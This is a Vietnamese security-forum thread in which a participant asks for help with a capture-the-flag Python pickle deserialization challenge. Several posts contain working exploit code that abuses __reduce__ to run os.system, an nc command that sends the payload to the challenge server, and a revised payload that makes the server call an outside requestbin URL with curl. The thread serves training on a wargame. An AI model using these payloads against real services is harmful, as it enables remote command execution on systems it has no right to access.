Cho cháu hỏi bài Misc06 trong Play ! 2

Thảo luận trong 'WhiteHat Challenge' bắt đầu bởi learn2hack, 07/06/18, 01:06 PM.

  1. learn2hack

    learn2hack Member

    Tham gia: 11/05/18, 01:05 PM
    Bài viết: 11
    Đã được thích: 1
    Điểm thành tích:
    3
    Cho cháu hỏi bài Misc06 trong Play ! 2
    theo Mô tả và Gợi ý
    Pickle

    OMG! Pickle again

    nc 103.237.98.28 7475
    là dạng bài Deserialization Pickle,

    cháu viết exploit sau
    #!/usr/bin/env python

    import pickle
    import os

    class Exploit(object):
    def __reduce__(self):
    return (os.system, ('ls',))
    #note = Note("name", "date", "content")
    with open("save.pickle", 'wb') as f:
    pickle.dump(Exploit(), f, protocol=0)


    gửi exploit bởi lệnh:
    cat save.pickle | nc 103.237.98.28 7475
    nhận được respone "Ahihihi?" từ server

    Cháu không hiểu ý đồ tác giả bài này là thế nào ạ?
     
    Lưu ý từ WhiteHat: Kiến thức an ninh mạng để phòng chống, không làm điều xấu. Luật pháp liên quan
  2. sunny

    sunny Điều hành viên Thành viên BQT

    Tham gia: 30/06/14, 10:06 PM
    Bài viết: 1,767
    Đã được thích: 776
    Điểm thành tích:
    113
    Chào bạn, bạn mình đã báo Mod phụ trách Wargame để phản hồi bạn nhé.
     
    Lưu ý từ WhiteHat: Kiến thức an ninh mạng để phòng chống, không làm điều xấu. Luật pháp liên quan
  3. Baby_parrot

    Baby_parrot Member

    Tham gia: 17/04/18, 02:04 PM
    Bài viết: 7
    Đã được thích: 4
    Điểm thành tích:
    3
    Bài này server không phản hồi, Nên bạn thử sử dụng kỹ thuật dùng lệnh curl lên host free để xem mình có thể thực hiện được câu lệnh hay chưa
     
    Lưu ý từ WhiteHat: Kiến thức an ninh mạng để phòng chống, không làm điều xấu. Luật pháp liên quan
  4. learn2hack

    learn2hack Member

    Tham gia: 11/05/18, 01:05 PM
    Bài viết: 11
    Đã được thích: 1
    Điểm thành tích:
    3
    Cháu sửa lại payload
    import cPickle
    import os

    cmd = "curl http://requestbin.fullcontact.com/5a23as26"

    class ex(object):
    def __reduce__(self):
    return (os.system,(cmd,))

    print cPickle.dumps(ex())


    gửi tới server nhưng không thấy phản hồi trên requestbin

    Vẫn chưa được, chú xem payload trên sao không chạy ạ?
     
    Lưu ý từ WhiteHat: Kiến thức an ninh mạng để phòng chống, không làm điều xấu. Luật pháp liên quan
  5. Baby_parrot

    Baby_parrot Member

    Tham gia: 17/04/18, 02:04 PM
    Bài viết: 7
    Đã được thích: 4
    Điểm thành tích:
    3
    Mình chạy payload của bạn vẫn bình thường, bạn xem lại nhé
     
    Lưu ý từ WhiteHat: Kiến thức an ninh mạng để phòng chống, không làm điều xấu. Luật pháp liên quan
  6. learn2hack

    learn2hack Member

    Tham gia: 11/05/18, 01:05 PM
    Bài viết: 11
    Đã được thích: 1
    Điểm thành tích:
    3
    Giờ được rồi chú gì ạ. Vui quá :) thanh chú
     
    Lưu ý từ WhiteHat: Kiến thức an ninh mạng để phòng chống, không làm điều xấu. Luật pháp liên quan
    sunny thích bài này.